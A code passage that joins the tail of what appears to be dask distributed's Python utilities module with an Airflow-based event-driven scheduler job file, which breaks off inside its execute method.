except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
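# Illustrative check (sketch with an assumed function, not part of the original
# module): has_keyword answers whether a callable accepts a given keyword argument.
#
#     def connect(address, timeout=10): ...
#     has_keyword(connect, "timeout")        # True
#     has_keyword(connect, "retries")        # False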
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
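# Illustrative behaviour (sketch, not part of the original module): the md5 digest
# makes the colour deterministic, so the same key always maps to the same palette
# entry across renders and processes.
#
#     color_of("my-task") == color_of("my-task")    # True
#     color_of("my-task") in palette                # True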
def _iscoroutinefunction(f):
# Python < 3.8 does not support determining if `partial` objects wrap async funcs
if sys.version_info < (3, 8):
while isinstance(f, functools.partial):
f = f.func
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
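# Illustrative usage (sketch, not part of the original module): the mapping evicts
# the least recently *looked-up* key once maxsize is reached.
#
#     cache = LRU(maxsize=2)
#     cache["a"] = 1
#     cache["b"] = 2
#     _ = cache["a"]        # "a" becomes most recently used
#     cache["c"] = 3        # evicts "b", the least recently used key
#     "b" in cache          # False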
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
if TYPE_CHECKING:
class SupportsToDict(Protocol):
def _to_dict(
self, *, exclude: Container[str] | None = None, **kwargs
) -> dict[str, AnyType]:
...
@overload
def recursive_to_dict(
obj: SupportsToDict, exclude: Container[str] = None, seen: set[AnyType] = None
) -> dict[str, AnyType]:
...
@overload
def recursive_to_dict(
obj: Sequence, exclude: Container[str] = None, seen: set[AnyType] = None
) -> Sequence:
...
@overload
def recursive_to_dict(
obj: dict, exclude: Container[str] = None, seen: set[AnyType] = None
) -> dict:
...
@overload
def recursive_to_dict(
obj: None, exclude: Container[str] = None, seen: set[AnyType] = None
) -> None:
...
def recursive_to_dict(obj, exclude=None, seen=None):
"""
This is for debugging purposes only and calls ``_to_dict`` methods on ``obj``
or its elements recursively, if available. The output of this function is
intended to be JSON serializable.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
This is forwarded to the objects' ``_to_dict`` methods, which are
responsible for honouring the exclusion.
seen:
Used internally to avoid infinite recursion. If an object has already
been encountered, its representation will be generated instead of its
``_to_dict``. This is necessary since we have multiple cyclic referencing
data structures.
"""
if obj is None:
return None
if isinstance(obj, str):
return obj
if seen is None:
seen = set()
if id(obj) in seen:
return repr(obj)
seen.add(id(obj))
if isinstance(obj, type):
return repr(obj)
if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (deque, set)):
obj = tuple(obj)
if isinstance(obj, (list, tuple)):
return tuple(
recursive_to_dict(
el,
exclude=exclude,
seen=seen,
)
for el in obj
)
elif isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude, seen=seen)
try:
hash(k)
except TypeError:
k = str(k)
v = recursive_to_dict(v, exclude=exclude, seen=seen)
res[k] = v
return res
else:
return repr(obj)
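# Illustrative behaviour (sketch, not part of the original module): containers are
# walked recursively, strings and None pass through, and anything unknown falls
# back to repr() so the result stays JSON-friendly.
#
#     recursive_to_dict(["a", ("b", None)])   # ('a', ('b', None))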
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import faulthandler
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.server_uri = server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
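# One pass of the scheduling loop: pop a single message from the mailbox,
# dispatch on its concrete event type, and return False only when a
# StopSchedulerEvent addressed to this job id (or to job id 0) is received.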
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.run_id).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._remove_periodic_events(event.run_id)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(run_id=event.run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_identified_message(msg)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, run_id, dag):
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {}'.format(run_id, task.task_id))
self.periodic_manager.add_task(run_id=run_id,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
@provide_session
def _remove_periodic_events(self, run_id, session=None):
dagruns = DagRun.find(run_id=run_id)
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {}'.format(run_id, task.task_id))
self.periodic_manager.remove_task(run_id, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.run_id, dag)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Update next_dagrun and next_dagrun_create_after for the given dag, or clear
next_dagrun_create_after when the dag is already at its max_active_runs limit.
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = set()
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
affect_dags.add(dag.dag_id)
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run.
The execution dates of currently active runs are queried inside this method
so the dag's ``max_active_runs`` limit can be enforced for this run.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return None
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and error_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session)\
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(run_id=dag_run.run_id).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo: scheduler self heartbeat
2. todo: detect failure of other scheduler instances
3. todo: time out stale dag runs
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
server_uri=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_service_uri=server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_server_uri(server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
